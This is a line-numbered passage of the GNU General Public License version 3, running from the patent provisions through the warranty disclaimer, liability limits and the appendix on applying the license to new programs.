467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------